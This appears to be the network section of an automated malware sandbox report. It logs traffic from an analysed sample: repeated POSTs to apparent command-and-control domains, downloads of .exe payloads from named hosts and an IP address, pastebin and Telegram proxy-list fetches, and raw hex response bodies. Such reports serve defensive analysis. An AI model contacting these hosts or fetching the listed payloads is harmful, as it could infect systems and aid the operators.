                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mbtiqoisbng.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 161Host: selebration17io.io
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cflepwuecdwdlle.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 114Host: selebration17io.io
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cbguytuewcurtbx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: selebration17io.io
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://spoycyuufprnueh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: selebration17io.io
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kcmqufrsnlej.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: selebration17io.io
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://emrlfbqltvs.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 242Host: selebration17io.io
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nerqibkmlpc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 209Host: selebration17io.io
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://htcxmdftrdwxnno.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: selebration17io.io
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ogopsbwfnbysgynq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 282Host: selebration17io.io
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nwjnqtbfmxoddob.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 346Host: selebration17io.io
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cjdvndnfdroykqao.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 129Host: selebration17io.io
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uuaysnecntyjjh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 132Host: selebration17io.io
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://glpsriaubfgujiwi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: selebration17io.io
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gbiinvopfmdt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: selebration17io.io
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://slivtqoptwvrgq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 142Host: selebration17io.io
                      Source: global trafficHTTP traffic detected: GET /ftp/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: ftpvoyager.cc
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ueeebefwwpm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: selebration17io.io
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fcgipjpvvtltjpvp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 137Host: selebration17io.io
                      Source: global trafficHTTP traffic detected: GET /order/tuc5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: hugo.topteamlife.com
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bgipahlogkotrrb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: selebration17io.io
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ltilqlkbbnhbgnpd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 182Host: selebration17io.io
                      Source: global trafficHTTP traffic detected: GET /288c47bbc187111b439df19ff4df68f076.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 5.42.66.0
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vrpyhybyscdqjqo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: selebration17io.io
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aunqllmjsfhfl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: gxutc2c.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fgxpblrvkyqfs.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 264Host: gxutc2c.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://byajjksfuiq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 365Host: gxutc2c.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uvkhejoinmlfb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: gxutc2c.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://skysuydpgasd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: gxutc2c.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ylfmtobnffbq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 343Host: gxutc2c.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jpxwajpdnkogimiw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 366Host: gxutc2c.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ctvxrapgisc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 281Host: gxutc2c.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ictpimjqevsiiw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: gxutc2c.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wjbrgmaqxdg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: gxutc2c.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oeuarjhscgtxb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: gxutc2c.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kmjcixwafidrft.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: gxutc2c.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gnptdrklcangjx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: gxutc2c.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ymhxlrbyafkagxbs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: gxutc2c.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ewuooimuofjgrsja.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: gxutc2c.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mjpupsgsyyvqpl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: gxutc2c.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://samlekvmkgd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: gxutc2c.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ioueyomybwjluyi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: gxutc2c.com
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.36.38.33
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.36.38.33
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.36.38.33
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.36.38.33
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.36.38.33
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.174.72
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.36.38.33
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.220.101.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.174.72
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.220.101.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.220.101.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.220.101.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.174.72
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.220.101.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 88.198.112.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 88.198.112.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 88.198.112.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.174.72
                      Source: unknownTCP traffic detected without corresponding DNS query: 88.198.112.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.174.72
                      Source: unknownTCP traffic detected without corresponding DNS query: 88.198.112.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 178.17.170.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
                      Source: unknownTCP traffic detected without corresponding DNS query: 178.17.170.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.23.244.244
                      Source: unknownTCP traffic detected without corresponding DNS query: 178.17.170.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 178.17.170.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 178.17.170.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.254.134.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.254.134.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.254.134.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.254.134.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.0
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.0
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.0
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.0
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.0
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.0
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.0
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.0
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.0
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.0
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.0
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.0
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.0
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.0
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0CFA30 InternetQueryDataAvailable,InternetReadFile,21_2_00007FF73D0CFA30
                      Source: global trafficHTTP traffic detected: GET /tor_proxies HTTP/1.1Host: t.meConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/z2fzAVz5 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /ftp/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: ftpvoyager.cc
                      Source: global trafficHTTP traffic detected: GET /order/tuc5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: hugo.topteamlife.com
                      Source: global trafficHTTP traffic detected: GET /288c47bbc187111b439df19ff4df68f076.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 5.42.66.0
                      Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: 4577.exe, 00000018.00000002.2986069883.0000000000400000.00000040.00000400.00020000.00000000.sdmp, csrss.exe, 00000026.00000002.2986522634.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: www.google.com,www.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)
                      Source: 4577.exe, 00000018.00000002.2991206454.0000000002815000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 00000026.00000002.2993994640.0000000002812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)
                      Source: 4577.exe, 00000018.00000002.2991206454.0000000002815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.yahoo.com} equals www.yahoo.com (Yahoo)
                      Source: unknownDNS traffic detected: queries for: selebration17io.io
                      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drownthinsaltroutese.pw
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 07 Jan 2024 04:29:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 38 0d 0a 04 00 00 00 1f 3d 5a e4 0d 0a 30 0d 0a 0d 0a Data Ascii: 8=Z0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 07 Jan 2024 04:29:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 02 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 c5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 48 93 80 40 51 0c 96 29 fd 5c 6d e5 21 cf b1 26 ad 77 14 07 ef f1 5c 2f 37 bb 0c a4 59 3f b7 e6 06 60 f7 90 aa 17 d3 91 53 98 a8 e9 86 3d d5 2b d6 52 a9 aa ce 6e b9 fd f4 f7 7f 08 00 b6 5f 96 43 35 30 ce 1a fe c9 80 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 63 0a 62 3e 59 20 03 5a a8 c3 1c 0c 56 3f cb 00 23 be 42 15 37 07 51 72 f1 ca 16 94 1d 79 52 2b e5 fd a3 7b 7e e8 ee ff 7f af 55 db c4 1d 13 13 bf 9e e1 92 24 08 4f d5 03 b1 cb a1 61 6e de f5 6c b9 19 17 7e 5f af 9a a0 44 c9 a0 c1 b9 dd 7a 0d 60 6e 19 e0 3c 95 a9 52 0d d4 96 bc 25 50 e1 9a d4 2e 7c 88 38 c8 48 6b a1 d0 4a 9a 13 fd ec 9e aa 7b ac 97 2f bd 61 05 c0 5d bf 20 34 fd f8 0e e8 33 6c b9 7d 0a 8d c7 7d c4 0e cc fb 7e 71 eb 80 f5 1a 68 9b 4a d8 19 ae cc 4f 3b 79 82 ae 9c 37 22 4c f9 7b ad f3 d7 93 28 b9 6e ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af 6b d9 55 65 ae ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b aa 93 58 1e 85 8a 64 b1 ce 59 12 51 8c 60 17 4b 81 1b df 8e 82 11 e8 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 54 c3 cb 49 5a 5e 90 39 7f 54 ab 1e 29 73 11 ee c3 4e 57 a3 4c 0d 85 1f d4 dc 68 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 a0 7d 10 df 3e dd b8 c4 f8 07 99 8a fd 9a 7f 74 79 c0 6d 43 cc 39 8b 8b e1 f2 7a d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 92 ae 46 df 94 a1 aa 7a 8f f6 6b e3 4a c1 d9 37 00 90 e2 1c c9 00 f5 52 48 d4 3b 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 43 eb ac 58 35 21 41 99 d6 cf 25 2e 17 87 ce ec 35 a8 c2 a7 0d 88 ca d4 5f 19 42 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 81 c4 a1 f3 0b 3e 88 fd c3 e8 c8 2f e1 c6 16 e8 8b 73 1f ac 18 88 68 b3 0e c3 80 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 53 e8 b8 0c 6b 90 94 12 f9 22 d9 ed 6f a2 52 dc 1a 1e ab 18 57 01 01 7d 42 83 a1 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 33 0f b6 25 8c 57 7a 14 0f 5b 30 5f a4 e7 b8 78 fe 11 ae 98 6d 48 5e 32 d0 49 d3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 11 20 b2 7f db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 07 Jan 2024 04:29:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 07 Jan 2024 04:29:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 0b d4 0c 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 e5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 93 0e 17 28 47 49 7e ae e9 bb 65 74 a3 47 3c 58 12 00 c6 ab b6 bc ec 4d 89 5f 15 af d4 d9 25 ff a3 40 3c 72 9b 63 c1 e8 12 ec ee 42 da fb 24 16 a6 67 4c 01 e2 55 70 9d 9e 6e bd af 63 a3 17 5e b9 61 c5 f6 8a 41 d2 60 54 68 56 42 01 e2 38 ae bf a1 67 99 fc d6 8d 86 db d6 1a 13 33 af a5 ac dd 6c ec bb 34 ed 07 ff b1 ba 6b 77 e5 4e 30 27 57 d1 50 ac db 35 2a 6f c1 c7 25 61 dd c8 2b cc 95 42 ac f5 03 23 f2 bb d4 d8 d7 d6 79 ac f0 b8 87 c8 e2 f6 1d a9 b3 a6 47 92 71 d7 21 7d 33 9e df c1 fa cb 1f 9e 1d 09 52 2b b5 c8 83 7b 32 44 f3 ff 3f a8 57 80 c4 0d 13 13 bf 1e e1 92 c4 08 4c c4 08 a0 c5 b1 61 3c dc f5 69 25 18 17 7e 5f af 9a 03 e4 c8 a0 c1 a9 dd 7a 0d f0 4c 19 e0 2c d5 a9 18 0a f5 96 be 27 51 61 9c d4 3e 7c 88 28 c8 48 6d a1 c0 4a 9a 03 fd ec 9e ba 7f ac 87 2b bd 61 cb 00 4e bf 45 34 fd 79 12 6c 23 6c 29 6c 0a 8d c7 fd f4 0e a4 fb 7e 71 eb 80 f5 1a 78 9b 4a d8 19 ae cc 4f 3b 79 82 ae d0 76 00 4c c1 56 ad f3 57 5b 29 b9 4e 4a cc 23 b2 75 0e 31 79 92 90 f7 6d a5 ff e7 b2 1a 4c 80 d0 12 f9 13 63 11 bb d6 9f e3 3e 27 80 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 df b6 79 39 26 e7 ac 04 28 84 42 40 77 9b c7 9b 84 87 3f 66 35 89 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 4e a1 54 55 8b fa d2 63 1b c3 cb 29 e3 69 e5 5b 1e 44 ab 1e 26 3f 13 ee c3 ca 57 a3 4c 1d 85 1f d4 5c 68 91 9c 29 06 f1 0c 5e ae 63 75 97 7b 85 d2 1c 10 9f 1a 2f d9 b0 99 67 9b 8a cd 7c 7f 74 79 16 6f 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 6b 